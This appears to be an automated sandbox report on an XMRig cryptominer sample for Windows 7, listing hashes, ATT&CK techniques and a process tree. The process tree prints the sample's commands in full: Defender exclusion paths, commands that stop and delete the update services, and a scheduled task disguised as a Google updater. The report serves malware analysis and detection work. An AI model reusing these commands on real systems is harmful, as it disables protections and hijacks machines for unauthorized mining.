xmrig | c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
01-10-2022 07:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9e2dccb45bffdc436741e88b0125cfba.exe
Size

4.0MB
MD5

9e2dccb45bffdc436741e88b0125cfba
SHA1

07ea0a692175a9a3c946263cb77fb8a328c8ebc1
SHA256

c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3
SHA512

457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a
SSDEEP

49152:gT7yVPROZiO+S/+wpOBvfP35y8XVA1drVgfQi4V9XBVzc/4zQFFaNzzcICyxhouf:gT72P2irffhy8XV+ZiWzwiNzxOAukKr

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/280-129-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/280-134-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/280-135-0x0000000000000000-0x0000000001000000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1640 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1640	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/280-129-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/280-134-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1364 taskeng.exe

pid	process
1364	taskeng.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1640 set thread context of 556	1640	updater.exe	conhost.exe
PID 1640 set thread context of 280	1640	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1576 sc.exe
1304 sc.exe
1068 sc.exe
1652 sc.exe
916 sc.exe
1796 sc.exe
748 sc.exe
612 sc.exe
1544 sc.exe
1812 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

932 schtasks.exe
952 schtasks.exe

pid	process
1576	sc.exe
1304	sc.exe
1068	sc.exe
1652	sc.exe
916	sc.exe
1796	sc.exe
748	sc.exe
612	sc.exe
1544	sc.exe
1812	sc.exe

pid	process
932	schtasks.exe
952	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
864	powershell.exe
1972	powershell.exe
664	powershell.exe
1264	powershell.exe
1372	powershell.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe
280	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	664	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1640	updater.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe
Token: SeShutdownPrivilege	1972	WMIC.exe
Token: SeDebugPrivilege	1972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1972	WMIC.exe
Token: SeRemoteShutdownPrivilege	1972	WMIC.exe
Token: SeUndockPrivilege	1972	WMIC.exe
Token: SeManageVolumePrivilege	1972	WMIC.exe
Token: 33	1972	WMIC.exe
Token: 34	1972	WMIC.exe
Token: 35	1972	WMIC.exe
Token: SeDebugPrivilege	1640	updater.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe
Token: SeShutdownPrivilege	1972	WMIC.exe
Token: SeDebugPrivilege	1972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1972	WMIC.exe
Token: SeRemoteShutdownPrivilege	1972	WMIC.exe
Token: SeUndockPrivilege	1972	WMIC.exe
Token: SeManageVolumePrivilege	1972	WMIC.exe
Token: 33	1972	WMIC.exe
Token: 34	1972	WMIC.exe
Token: 35	1972	WMIC.exe
Token: SeLockMemoryPrivilege	280	dwm.exe
Token: SeLockMemoryPrivilege	280	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9e2dccb45bffdc436741e88b0125cfba.execmd.exepowershell.exepowershell.exetaskeng.exeupdater.execmd.exe

description	pid	process	target process
PID 2032 wrote to memory of 864	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 864	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 864	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 1336	2032	9e2dccb45bffdc436741e88b0125cfba.exe	cmd.exe
PID 2032 wrote to memory of 1336	2032	9e2dccb45bffdc436741e88b0125cfba.exe	cmd.exe
PID 2032 wrote to memory of 1336	2032	9e2dccb45bffdc436741e88b0125cfba.exe	cmd.exe
PID 2032 wrote to memory of 1972	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 1972	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 1972	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 1336 wrote to memory of 916	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 916	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 916	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1796	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1796	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1796	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 748	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 748	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 748	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 612	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 612	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 612	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1576	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1576	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1576	1336	cmd.exe	sc.exe
PID 1336 wrote to memory of 1148	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 1148	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 1148	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 240	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 240	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 240	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 632	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 632	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 632	1336	cmd.exe	reg.exe
PID 1972 wrote to memory of 932	1972	powershell.exe	schtasks.exe
PID 1972 wrote to memory of 932	1972	powershell.exe	schtasks.exe
PID 1972 wrote to memory of 932	1972	powershell.exe	schtasks.exe
PID 1336 wrote to memory of 1000	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 1000	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 1000	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 808	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 808	1336	cmd.exe	reg.exe
PID 1336 wrote to memory of 808	1336	cmd.exe	reg.exe
PID 2032 wrote to memory of 664	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 664	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 2032 wrote to memory of 664	2032	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 664 wrote to memory of 1568	664	powershell.exe	schtasks.exe
PID 664 wrote to memory of 1568	664	powershell.exe	schtasks.exe
PID 664 wrote to memory of 1568	664	powershell.exe	schtasks.exe
PID 1364 wrote to memory of 1640	1364	taskeng.exe	updater.exe
PID 1364 wrote to memory of 1640	1364	taskeng.exe	updater.exe
PID 1364 wrote to memory of 1640	1364	taskeng.exe	updater.exe
PID 1640 wrote to memory of 1264	1640	updater.exe	powershell.exe
PID 1640 wrote to memory of 1264	1640	updater.exe	powershell.exe
PID 1640 wrote to memory of 1264	1640	updater.exe	powershell.exe
PID 1640 wrote to memory of 1584	1640	updater.exe	cmd.exe
PID 1640 wrote to memory of 1584	1640	updater.exe	cmd.exe
PID 1640 wrote to memory of 1584	1640	updater.exe	cmd.exe
PID 1640 wrote to memory of 1372	1640	updater.exe	powershell.exe
PID 1640 wrote to memory of 1372	1640	updater.exe	powershell.exe
PID 1640 wrote to memory of 1372	1640	updater.exe	powershell.exe
PID 1584 wrote to memory of 1304	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1304	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1304	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1544	1584	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\9e2dccb45bffdc436741e88b0125cfba.exe
"C:\Users\Admin\AppData\Local\Temp\9e2dccb45bffdc436741e88b0125cfba.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:916

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1796

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:748

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:612

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1148

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1576

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:240

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:632

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1000

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
3⤵
- Creates scheduled task(s)
PID:932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1568

C:\Windows\system32\taskeng.exe
taskeng.exe {7A87F41F-20DB-4085-AAC0-A58A30A5D213} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1364

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1304

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1544

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1068

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1812

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1652

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:612

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:1772

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:1416

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1520

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
4⤵
- Creates scheduled task(s)
PID:952

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe jmcfgycslfymn
3⤵
PID:556

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
PID:1428

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:280

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
1⤵
PID:1512

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
134B

MD5
13704a81e6a12d0657753b6746a4fb24

SHA1
9e1dd1fa6000c991e12a1ab41f3fb04ed37a6cca

SHA256
56556055091ba96cf10e85b2db4c5154e2b647b832a272915f973862c3c531a4

SHA512
e099d6c94c431c4cc9df82f4993a8d91a36b1c351f1a4eb699fc6b67b3a8dd0c386b2346dc1dcb854db004cea2070f38d717caba8a922926ecec968ebe6db66e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
c3996d158aa96bdd09d1554fd467d37f

SHA1
f26f0661da80cd3d081f692218d52a12227c6e98

SHA256
cc3ac5c9ff1959b1eef05b4ac6888602cd89932d38d4b4840ab06fd9af355385

SHA512
873d0605daa1cd7206efd1b44c409c68a415fe2ea2a2c45ab0b30004509ef219a646dde21048832bdc8e187a6146f918934cb44528e7dc38141d8e626fed45ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
c3996d158aa96bdd09d1554fd467d37f

SHA1
f26f0661da80cd3d081f692218d52a12227c6e98

SHA256
cc3ac5c9ff1959b1eef05b4ac6888602cd89932d38d4b4840ab06fd9af355385

SHA512
873d0605daa1cd7206efd1b44c409c68a415fe2ea2a2c45ab0b30004509ef219a646dde21048832bdc8e187a6146f918934cb44528e7dc38141d8e626fed45ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
c3996d158aa96bdd09d1554fd467d37f

SHA1
f26f0661da80cd3d081f692218d52a12227c6e98

SHA256
cc3ac5c9ff1959b1eef05b4ac6888602cd89932d38d4b4840ab06fd9af355385

SHA512
873d0605daa1cd7206efd1b44c409c68a415fe2ea2a2c45ab0b30004509ef219a646dde21048832bdc8e187a6146f918934cb44528e7dc38141d8e626fed45ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
c3996d158aa96bdd09d1554fd467d37f

SHA1
f26f0661da80cd3d081f692218d52a12227c6e98

SHA256
cc3ac5c9ff1959b1eef05b4ac6888602cd89932d38d4b4840ab06fd9af355385

SHA512
873d0605daa1cd7206efd1b44c409c68a415fe2ea2a2c45ab0b30004509ef219a646dde21048832bdc8e187a6146f918934cb44528e7dc38141d8e626fed45ba

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
memory/240-76-0x0000000000000000-mapping.dmp

Download
memory/280-130-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/280-128-0x00000001407F25D0-mapping.dmp

Download
memory/280-134-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/280-135-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/280-131-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/280-129-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/328-118-0x0000000000000000-mapping.dmp

Download
memory/556-124-0x00000001400014E0-mapping.dmp

Download
memory/612-72-0x0000000000000000-mapping.dmp

Download
memory/612-111-0x0000000000000000-mapping.dmp

Download
memory/632-77-0x0000000000000000-mapping.dmp

Download
memory/664-86-0x000007FEF46F0000-0x000007FEF5113000-memory.dmp

Filesize
10.1MB

Download
memory/664-87-0x000007FEF3B90000-0x000007FEF46ED000-memory.dmp

Filesize
11.4MB

Download
memory/664-91-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/664-90-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/664-88-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/664-83-0x0000000000000000-mapping.dmp

Download
memory/748-68-0x0000000000000000-mapping.dmp

Download
memory/808-80-0x0000000000000000-mapping.dmp

Download
memory/864-59-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/864-60-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
